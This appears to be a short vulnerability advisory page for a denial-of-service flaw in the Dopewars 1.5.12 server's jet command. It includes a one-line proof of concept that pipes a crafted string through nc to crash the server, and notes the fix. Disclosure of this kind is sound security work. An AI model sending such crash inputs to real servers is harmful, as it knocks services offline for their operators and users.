Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22572
HistoryOct 07, 2009 - 12:00 a.m.

Dopewars 1.5.12 Server Denial of Service

2009-10-0700:00:00
vulners.com
15

Description

The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input
validation.

POC

ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902

Fix

This issue is resolved in the SVN version of the application.

Discovered by Doug Prostko